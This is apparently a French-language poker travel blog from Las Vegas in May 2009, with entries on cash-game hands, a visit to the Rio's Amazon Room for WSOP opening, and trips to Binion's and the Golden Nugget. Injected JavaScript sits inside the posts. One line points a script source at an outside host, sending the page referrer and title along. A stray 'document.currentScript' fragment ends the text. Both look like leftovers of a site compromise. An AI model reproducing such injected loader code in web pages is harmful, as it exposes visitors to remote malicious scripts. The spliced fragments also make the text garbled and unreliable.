Pas grave, j’en choisi un autre, et je mange en lisant Poker Pro… Truc classique, quoi…

Je passe ensuite à la poker-room où je m’assoie à une table de CG 1-2 NoLimit avec 100$ devant moi. Oui, je sais, je ne me cave jamais très profond, mais je préfère pouvoir me caver deux fois, plutôt que de risque de tout perdre en une seule. Ce n’est pas la stratégie recommandée, mais c’est ma stratégie de « confort ».

Bon, la séance ne se passe terriblement bien. Je perds la 1ère cave avec mes J-J relancés à 11$ préflop qui sont payés par K-8 offsuit qui fera Full. Normal, quoi.

Je me recave donc à 100$ et arrive gentiment à remonter à 150$.

Mes buddies sont arrivés et je décide de quitter la table et d’arrêter là l’hémorragie. Je leur donne leur jeton de 1$ du Stratosphere et on y va.

Oui, je ne vous ai pas dit pour l’histoire des jetons. A chaque session de CG, chacun de nous garde quelques jetons de 1$ qu’il donne aux autres pour les rapporter en souvenir. J’en ai déjà une dizaine. Je les nettoie au savon et à l’alcool une fois rentré à l’hôtel, tellement un jeton de poker peut-être bourré de germes ! Beuark !

chips.jpg

Un truc que je fais toujours, d’ailleurs : j’ai avec moi une petite bouteille de gel hydro-alcoolique pour me nettoyer les mains de temps en temps à la table de poker. On n’a toujours pas attrapé la grippe porcine, mais un Escherischia Coli, ça peut venir vite, avec tous les gens qui jouent avec les mains crades… Re-Beuark !

Ensuite, direction le Rio, où nous allons soutenir Rémy et Fabrice, comme Manu l’explique dans son article.

rionuit.jpg

Je discute un peu avec Andy Black, que j’avais déjà croisé à l’Irish Open. On parle bouddhisme, trotinette, etc… Classique, quoi.

andyblack.jpg

Puis nous décidons d’aller au Hard-Rock Café, situé un peu off-strip, car nous n’avons pas encore de jetons de là-bas (lol !).

Un taxi-ride et un verre de Mojito plus loin, nous voici inscrits à une table qui ne va pas tarder à ouvrir. Comme à mon habitude, je me dis : 100$ + 100$ maxi. Mais quand je vois les Benjamins (billets de 100$) sortir des poches des gars, je me dis que je vais avoir du mal à batailler… Je pose donc 160$ sur la table et on verra bien…

Je ne joue aucune main au début, tellement la table fait n’imp’ ! Ca envoie des tapis à 350$ sur des 3ème paires, etc… les mecs picolent, parlent fort… ! Wow ! Avec la musique à donf’ derrière tout ça et l’alarme incendie, la session ne va pas être de tout repos !

Mais bon, mon image de serrure à la table n’ayant même pas effleuré l’esprit des autres joueurs, je me retrouve à payer une relance préflop à 15$ avec 9-9. Un autre joueur à ma gauche suit pour 15$. Le pot doit être déjà à 48$ au moins. J’appelle un 9 dans ma tête et il arrive sur un flop : 7-9-J. Bon, je suis battu par J-J ou 8-T, mais bon, c’est le moment où jamais d’aller à fond et d’essayer de prendre un max.

Le premier relanceur checke, et je checke aussi étant persuadé que le dernier joueur va miser. Cela ne loupe pas, il ouvre à 45$, payé par l’autre joueur. J’envoie mon tapis en faisant semblant de réfléchir un peu, même si la décision était prise depuis longtemps. Il réfléchit un peu, me questionne, mais je ne répond strictement rien, je suis immobile, les lunettes de soleil sur les yeux, je tente de respirer doucment, malgré un coeur qui va défoncer mon t-shirt…

Il paye ! L’autre joueur sort du coup et je montre ma main, étant le premier de parole. Le gars me dit bien joué et mucke ses cartes. Il m’a semblé voir une Dame. Il en avait peut-être deux, je ne sais pas…

Je tippe le dealer d’un jeton de 5$ et empile les autres.

Je ne joue ensuite plus aucune main. Eric quitte la table peu après, un peu énervé de voir l’action incontrôlable qu’il s’y déroule. On reste encore un peu avec Manu et on quitte à notre tour la table une demie-heure après avec 140$ de bénéfices nets.

On rentre à l’hôtel, on se boit une dernière bière devant une machine de vidéo-poker, je touche un petit carré de Dix et tout va bien…

videopoker10s.jpg

Demain, début du tournoi anniversaire (le mien ? je suis né en 1970, moi aussi) au Rio.

wsop1970.jpg

Buy-in 40.000$. Je ne les ai pas réuni depuis le début de notre séjour. Je pense que je ne vais pas le faire.

Lol.

(à suivre)

Bonus un peu plus bas :

Les serveuses du Rio :

rioserveuses1.jpg

rioserveuses2.jpg

rioserveuses3.jpg

C’est l’office du Tourisme de Las Vegas qui nous a demandé de poster ça…

Le mardi en ballade…

mercredi, mai 27th, 2009

Ouverture des WSOP…

Mardi 26 Mai

Cet après-midi, le groupe se sépare : deux séries de tournois ouvrent en même temps.

Au Rio, ce sera le premier jour des enregistrements et des Satellites pour les WSOP 2009, tandis qu’au Binion’s comencent les Binion’s Classic of Poker.

Matador et moi allons au Rio pour « kiffer », Gedeubor décide d’aller au Binion’s pour perfer.

Et oui, on est une équipe, un mob, on se complète, quoi 🙂

On prend donc le Deuce, le bus qui longe le Strip pour 3$ pour aller jusqu’au casino Harra’s, situé au centre du Strip et dans lequel nous prenons la navette gratuite qui nous emmène jusqu’au Rio, situé « off-strip » comme on dit ici.

Dans le Harra’s, nous croisons Brenda et son mari :

brenda.jpg

…tout droit sorti de la pub pour la Française des Jeux 🙂

Quelques dizaines de minutes et tassements de vertèbres plus tard (« dis, M’sieur Harra’s, tu pourrais pas changer les amortisseurs de tes fourgons cellulaires euh… de tes navettes qui vont au Rio ?).

rio.jpg

Wow, l’excitation et l’émotion monte…

Après avoir parcouru les salles de machines à sous et les couloirs du Rio (sans pour autant se faire envoyer au pénitencier pour cause de filmage interdit), nous arrivons dans le saint-des-saint : l’ Amazon-room !

Matador et moi ne resistons pas à l’envie de nous asseoir à une table, même sans jetons, même sans joueur, juste pour le kiff  8)

amazonroom2.jpg

amazonroom.jpg

Quel pied !

Quelques Sit’n Go satellites se jouent dans certaines parties de la salle ou dans la Brazilia Room, puis à 18h commence un satellite multi-table à 1.575$, qualifiant pour le Tournoi anniversaire à 40.000$ qui commence Jeudi.

Nous y retrouvons le joueur français Rémy Biechel, qui laisse passer 2 orbites complètes juste pour le plaisir de discuter avec nous. Ce gars est vraiment (je le savais déjà, mais bon) adorable et qui plus est bourré de talent. C’est une valeur sûre du poker français 😉

Quelques autres têtes célèbres parsèment le field d’environ 80 joueurs : Barry Greenstein, Michael Binger, Michael Mizrachi, Eli Elezra, etc…

Passage obligé par la boutique de souvenirs pour cramer quelques dollars…

Puis retour à notre hôtel car ce soir nous allons dans un bar pour un concert rock où nous avons été invité par une charmante demoiselle qui fait du « drums » et du « mike » (faut le mimer, normalement, mais là, c’est pas possible…).

Ou pas.

Mais ça, ce serait alors à cause de Gedeubor.

Alors Rock ou pas Rock, ce soir ?

(to be continued…)

Session de Cash Game gagnante ???

mercredi, mai 27th, 2009

Mardi 26 mai ,

6h30 du matin le reveil sonne comme prevu , c’est l’heure d’aller a la peche ….
je vais prendre mon taxi devant l’hotel, diection une nouvelle poker rrom destination Planet Hollywood ,

Arrivée sur place deux table no limit 1:2  sont ouvertes , 1 place libre a l’une d’entre elles , je regade la profondeur des tapis avant de m’assoir , et a part un gars qui a le « Front view » de Mahatan devant lui , les autres ont des tapis allant de 100 a 250 , je vais donc caver a 150 ….

J’arrive a ma place , le Hi guys , est d’office a la table et quelques  secondes apres le Where are you from aussi …
je reponds France …. et on me reponds « Sweet » , je reponds pas  …. en tout cas j’espere le faire avec mes cartes ..

Rien de particulier a raconter la premiere heure et demi, je passe de 150 a 240 jouant les spots « surs » … Ah si ma premiere relance trouve deux payeurs qui payent jusqu’a la turn mon continuation bet .. plus pour me tester que que prendre le pot …. en tout les cas c’est l’impresssion que j’ai eu …

Puis , le coup qui me donnera du credit supplementaire arive :

Je suis Cut off , je recois , A10  a trefles je relance et suis payé deux fois …

FLOP : A 8 10, ca fait plaisir , papa est content et commence sortir le fillet ….
ca check devant moi, a ses tables c’est jamis trop bon signe ….
bien evidement je BET 2/3 du pot …. on a compris que ici , il faut donner de la value a nos mains ..
Je suis payé une seule fois mais le type fait trop de manieres pour etre credible, il cache quelque chose , quoi , c’et la question ???
Turn 4
Il check, je le sens vraiment pas ce coup …. je check aussi … tout facons j’aurais la possition sur lui a la river …
River : 2
et voila l’action arrive , il bet 1/2 du pot ….. je suis sur quil trape depuis le debut …et la l’actor studio facon Matador commence , le tout en VO:
Tell way you think that i have to call , normaly 2 pairs will be good in this board , but you know what … you a have a poket 88 , ant i cant call you , Wright ???
Evidement il rponds pas …. j’attends une minutes ou pas loin et folde ouvertes mes deux paire A10 ….
il me sourit me montre :   88 ….
la table tape gentillement avec la paume de la mian sur la table( en me regardant moi ) .. on sait tous ce que cela vaut dire … respect !!!

Ca y est , mon image est assez bonne a la table …. j’ai pris qualque pots et j’ai fait un bon read et bon fold ….

Puis la main du trip, en tout les cas la mienne ….

je recoit KK a la grosse blinde ….

ca relance une fois depuis l’UTG 10
payé 2 fois ….je suis sur qu’il y a des AX dans le lot et decide de pas juste payer ….donc RAISE 40 ….
call, call, call ….. Oh My God …..pas d’AS au board svp !!!
POT = 161 $

Flop : 5 K 7 Rainbow, sortez la flote, les chaluts vont etre pleins ,  des lors la question est : comment optimiser ma main …
check , 80 , Fold … a moi de jouer … j’en tien un, mais pourquoi pas deux …..CALL , et le troiseme Call aussi !!!
POT = 401 $ , il me reste 83 derriere ….
Turn : 5, bien , et ba on est pas mal on dirait ….. il n’y a que la paire de 55 en main qui me bat ….
Check, 100 …. a moide parler ,j’ai le deuxieme main … et vu la hauteur du pot je peut pas passer , tant pis si il a les 55… donc CALL ALL IN !!!!!!! le troiseme laron FOLD , mais avec quoi il a suive tout du long ????
Je suis donc en Heads Up , j’ai payé , il montre sa main ……………;;;;;;; 77
il a full 77755 contre mon mon KKK55 ….. yes papa ……ah mais le poker c’st bien 5 cartes au board ….

POT = 567 $
RIVER : 7

Voila , je quitte la table sans un mot , allege de 150 $ , mais surtout avec une haaaaine mortelle contre les dieux de la fucking River ….. je pense avoir bien menée mon coup avoir  bien trapé , le me »c ne joue pas pal le coup non plus .. c’est juste les cartes ….. quelques fois elles sont avec vous d’autres pas …. au moins je pars avec un e bonne image a la table , le prochain frenchie qu’ils rencontreornt sera certainement plus respecté que avant …..en tout les cas pour moi ,.. c’est out ….. Mais bon cette aprem on va au RIO et je vais m’impregner de ce liue et tout ira mieux …..de plus le fait d’etre trois ca permet d’absorber les coups bas et de remonter , ah mon Gedeubor ???

Bon voila ….. more cards next time

Matadors.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Terre Sainte …

mardi, mai 26th, 2009

Lundi 25 mai , Vegas .
Alors que le soleil continue a taper comme a son habitude sur le strip,
que les amerloques fetent leur Memorial Day , sans faillir tout de même a dehambuler de casino en casino
de Clim en Clim, nous on continue nos rithes initiatiques pokeriens , perso ce matin je fait pas notre tournoi matinal du Sahara, ou maintenant nous sommes connus comme le loup blanc …. on a tous les trois fait des tables finales sur ce tournoi ( en 4 tournois jouées !!! ), en gros j’ai peur que trop de poker tue le poker … j’ai pas enviue de le faire juste parce que il faut le faire , donc pour moi ce matin c’est fold !!!!

J’en ai profité pour vous poster des photos , d’ailleurs !

Alors que cette journée ce presente assez bien ,  que TeddyKGB nous rejoint , on planifie notre sortie sur freemont ,
autrement dit , sur le Binions, le Golden Nugget et le 4 Queens ….

teamatbinion.jpg

binions1.jpg

4queens.jpg

La vérité, poser les pieds au Binion’s , lorsque le poker et plus notament le texas Holdem no limit represente quelque chose pour vous …. c’est un peu comme si vous retourniez pares 50 ans sur le lieu de votre naissance …..
Scribe et moi même avons posée un genoux a terre et presque embrasse le sol !!!!

Puis tout s’accelere , en traversant les allées de bandits manchots , de tables de blackjack dans toutes ses variantes, les roulettes et autres mavines et tables dont je serais incapable de vous expliquer le fonctionement …
nous voyons au loin un panneau ,

 bionionspokerroomsign.jpg

 un desk est planté au millieu et de part et d’autre se trouvent des photos , le Hall of Fame et le Wall of champions, nous prenons le temps de nous assoir et de vivre ce moment ….

Puis on apprends qu’un tournoi va se jouer , alors forcement , on va s’informer ….on arrive  a la poker tournament room … elle est eloignée des machines a sous et des autres jeux, c’est pas le cas de toutes les pokers rooms , quelques fois c’est même injouable, mais la c’est juste cooooool !!!

bionionspokerroommatador.jpg

Gedeubor et Scribe l’on fait …. masi ils sont super decus, je leur laisse le champ pour vous faire le compte rendu ….

Entre temps nous decidons d’aller voir le Golden Nugget , lieu aussi reconnu pour les emissions TV qui y sont toutnées , et par les etapes WPT qu’il a recu …

Nous voyons qu’ils ont en cours un WPT Boot Camp , et evidement nous allons voir !!!

wptbootcamp.jpg

je m’assois a une table, tranquile , en fait il y plus personne …

matadorwptbootcamp.jpg

puis en sortant , quelle surprise, on croisse TJ-Cloutier , l’un des intervenants du bootcamp … je l’acoste et il acceptye avec gentiellesse de prendre une photo avec nous ….
A propos , c’est un ancien joueur de foot US , nous on fait pas 1 metre 20 et lui 1,80 ….

teamandtjcloutier.jpg

voila les amis , une journée pas comme les autres ,elle se finit avec le sentiment d’avoir touché de pres ce que nous etions venus chercher a Vegas ……

Un petit bonus ….. vous la connaissez cette piscine ????if (document.currentScript) {